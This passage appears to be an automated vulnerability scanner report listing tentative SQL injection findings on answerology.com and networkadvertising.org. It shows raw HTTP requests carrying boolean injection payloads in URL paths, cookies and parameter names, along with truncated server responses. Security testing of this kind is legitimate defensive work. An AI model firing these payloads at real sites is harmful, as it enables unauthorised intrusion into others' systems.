<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cssjs/countdownTimer.js23080796'%20or%201%3d2--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:43 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.36. http://www.answerology.com/index.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /index.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.aspx'%20and%201%3d1--%20?template=ads.ascx&topic=homepage&tile=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:28:03 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /index.aspx'%20and%201%3d2--%20?template=ads.ascx&topic=homepage&tile=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:28:04 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.37. http://www.answerology.com/uploaded-images/801818/40x37_thumb.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /uploaded-images/801818/40x37_thumb.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 98525213%20or%201%3d1--%20 and 98525213%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:28:01 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /uploaded-images/80181898525213%20or%201%3d2--%20/40x37_thumb.jpg HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:28:01 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.38. http://www.networkadvertising.org/managing/opt_out.asp [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.networkadvertising.org
Path:   /managing/opt_out.asp

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /managing/opt_out.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://networkadvertising.org/consumer/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1392774634.1315133979.1315133979.1315416406.2; __utmz=1.1315416406.2.2.utmccn=(referral)|utmcsr=allthingsd.com|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#|utmcmd=referral'%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:43:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:43:52 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<img width='239' height='45' name='opt_1' src='http://optout.imiclk.com/cgi/nai_status.cgi?nocache=0.5000116'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=1></td></tr><tr><td valign=top><b>AdBrite</b><br><a href=# onClick="window.open('2.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_2' src='http://www.adbrite.com/mb/nai_optout_check.php?nocache=0.417152'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=2></td></tr><tr><td valign=top><b>AdChemy</b><br><a href=# onClick="window.open('3.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_3' src='http://events.adchemy.com/visitor/auuid/nai-status?nocache=0.1968892'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=3></td></tr><tr><td valign=top><b>Adconion</b><br><a href=# onClick="window.open('4.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_4' src='http://ads.amgdgt.com/ads/opt-out?op=check&src=NAI&j=&nocache=0.5920985'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=4></td></tr><tr><td valign=top><b>Adara Media</b><br><a href=# onClick="window.open('5.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_5' src='http://optout.yieldoptimizer.com/optout/ns?nocache=0.4064707'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=5></td></tr><tr><td valign=top><b>Adify Media</b><br><a href=# onClick="window.open
...[SNIP]...

Request 2

GET /managing/opt_out.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://networkadvertising.org/consumer/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1392774634.1315133979.1315133979.1315416406.2; __utmz=1.1315416406.2.2.utmccn=(referral)|utmcsr=allthingsd.com|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#|utmcmd=referral'%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:43:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:43:54 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<img width='239' height='45' name='opt_1' src='http://optout.imiclk.com/cgi/nai_status.cgi?nocache=7.551211E-02'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=1></td></tr><tr><td valign=top><b>AdBrite</b><br><a href=# onClick="window.open('2.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_2' src='http://www.adbrite.com/mb/nai_optout_check.php?nocache=0.9926525'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=2></td></tr><tr><td valign=top><b>AdChemy</b><br><a href=# onClick="window.open('3.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_3' src='http://events.adchemy.com/visitor/auuid/nai-status?nocache=0.7723897'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=3></td></tr><tr><td valign=top><b>Adconion</b><br><a href=# onClick="window.open('4.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_4' src='http://ads.amgdgt.com/ads/opt-out?op=check&src=NAI&j=&nocache=0.167599'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=4></td></tr><tr><td valign=top><b>Adara Media</b><br><a href=# onClick="window.open('5.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_5' src='http://optout.yieldoptimizer.com/optout/ns?nocache=0.9819712'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=5></td></tr><tr><td valign=top><b>Adify Media</b><br><a href=# onClick="window.o
...[SNIP]...

1.39. http://www.networkadvertising.org/managing/opt_out.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.networkadvertising.org
Path:   /managing/opt_out.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 30670060'%20or%201%3d1--%20 and 30670060'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /managing/opt_out.asp?130670060'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://networkadvertising.org/consumer/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1392774634.1315133979.1315133979.1315416406.2; __utmz=1.1315416406.2.2.utmccn=(referral)|utmcsr=allthingsd.com|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#|utmcmd=referral

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:44:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:44:06 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<img width='239' height='45' name='opt_1' src='http://optout.imiclk.com/cgi/nai_status.cgi?nocache=0.5953485'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=1></td></tr><tr><td valign=top><b>AdBrite</b><br><a href=# onClick="window.open('2.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_2' src='http://www.adbrite.com/mb/nai_optout_check.php?nocache=0.512489'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=2></td></tr><tr><td valign=top><b>AdChemy</b><br><a href=# onClick="window.open('3.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_3' src='http://events.adchemy.com/visitor/auuid/nai-status?nocache=0.2922261'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=3></td></tr><tr><td valign=top><b>Adconion</b><br><a href=# onClick="window.open('4.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_4' src='http://ads.amgdgt.com/ads/opt-out?op=check&src=NAI&j=&nocache=0.6874354'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=4></td></tr><tr><td valign=top><b>Adara Media</b><br><a href=# onClick="window.open('5.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_5' src='http://optout.yieldoptimizer.com/optout/ns?nocache=0.5018076'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=5></td></tr><tr><td valign=top><b>Adify Media</b><br><a href=# onClick="window.ope
...[SNIP]...

Request 2

GET /managing/opt_out.asp?130670060'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://networkadvertising.org/consumer/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1392774634.1315133979.1315133979.1315416406.2; __utmz=1.1315416406.2.2.utmccn=(referral)|utmcsr=allthingsd.com|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#|utmcmd=referral

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:44:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:44:06 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
